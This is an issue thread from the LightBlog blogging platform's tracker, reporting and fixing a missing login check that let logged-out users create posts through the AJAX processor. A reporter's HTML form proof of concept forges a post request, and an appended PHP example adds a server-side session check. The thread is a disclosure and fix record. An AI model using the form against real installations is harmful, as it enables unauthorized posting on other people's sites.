soren121 / lightblog

PHP/SQLite blogging platform
GNU General Public License v3.0

Posting posts without being logged in. #18

Closed soren121 closed 9 years ago

soren121 commented 9 years ago

From joeyvanh...@gmail.com on May 31, 2010 05:40:47

What steps will reproduce the problem?

  1. Log in
  2. create post & log out
  3. Submit the post

What is the expected output? What do you see instead?

A security measurement should stop you from being able to post when logged out. However the ajax processor seems to simply create the post even when you're logged out.

What version of the product are you using? On what operating system?

0.9.3 beta 1

If any, please paste the errors given below.

Original issue: http://code.google.com/p/lightblog/issues/detail?id=18

soren121 commented 9 years ago

From joeyvanh...@gmail.com on May 31, 2010 10:59:13

```html
<form action="http://127.0.0.1/LightBlog/Sources/ProcessAJAX.php" method="post" id="haxorz">
    <p><input name="create" value="1" type="text" id="create" />
    <label for="create"><small>create</small></label></p>
    <p><input name="type" value="post" type="text" id="type" />
    <label for="type"><small>type</small></label></p>
    <p><input name="title" value="title" type="text" id="title" />
    <label for="title"><small>title</small></label></p>
    <p><input name="text" value="blahblah testhackzors" type="text" id="text" />
    <label for="text"><small>text</small></label></p>
    <p><input name="published" value="1" type="text" id="pub" />
    <label for="pub"><small>published</small></label></p>
    <p><input name="comments" value="1" type="text" id="com" />
    <label for="com"><small>comments</small></label></p>
    <p><input name="hax_submit" type="submit" value="Submit" id="haxsubmit" /></p>
</form>
```

This HTML can create a post for everyone logged out.

soren121 commented 9 years ago

From doodle62 on May 31, 2010 13:04:40

(No comment was entered for this change.)

Status: Accepted
Labels: -Priority-Medium Priority-Critical

soren121 commented 9 years ago

From doodle62 on May 31, 2010 13:06:28

(No comment was entered for this change.)

Labels: Milestone-0.9.3

soren121 commented 9 years ago

From doodle62 on May 31, 2010 18:11:31

The post creation routines have been secured, still working on the editing routines...

Status: Started

soren121 commented 9 years ago

From doodle62 on June 03, 2010 09:48:02

Fixed in SVN r485.

Status: Fixed
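
The server-side check this report calls for, as an added example that is not LightBlog's code and not the r485 change: one deny-by-default guard that runs before any write, so the create and edit routines cannot be secured separately and drift apart. The session key `user_id`, the function name, and the `edit` and `delete` action names are assumptions.

```php
<?php
// Added example; not LightBlog's code. The session key 'user_id' and the
// action names other than 'create' are assumptions for illustration.

const STATE_CHANGING_ACTIONS = ['create', 'edit', 'delete'];

/**
 * Decide whether an AJAX request may proceed. Returns an HTTP status code:
 * 200 = allowed, 400 = no recognised action, 403 = no authenticated session.
 */
function authorize_ajax_request(array $session, array $post): int
{
    $requested = array_intersect(STATE_CHANGING_ACTIONS, array_keys($post));
    if ($requested === []) {
        return 400;
    }
    // Deny by default: every state-changing action needs a logged-in session,
    // regardless of which page or form the request came from.
    if (empty($session['user_id'])) {
        return 403;
    }
    return 200;
}

if (PHP_SAPI !== 'cli') {
    // Endpoint usage: first lines of the handler, before any database write.
    session_start();
    $status = authorize_ajax_request($_SESSION, $_POST);
    if ($status !== 200) {
        http_response_code($status);
        exit;
    }
    // ... only now dispatch to the create/edit routines ...
} else {
    // Constructed sample: the fields sent by the form in the report above.
    $forged = [
        'create' => '1', 'type' => 'post', 'title' => 'title',
        'text' => 'blahblah testhackzors', 'published' => '1', 'comments' => '1',
    ];
    var_dump(authorize_ajax_request([], $forged));               // logged out
    var_dump(authorize_ajax_request(['user_id' => 7], $forged)); // logged in
}
```

Run from the command line, the block evaluates the reported form fields with and without a session; served over HTTP, the same function gates the handler.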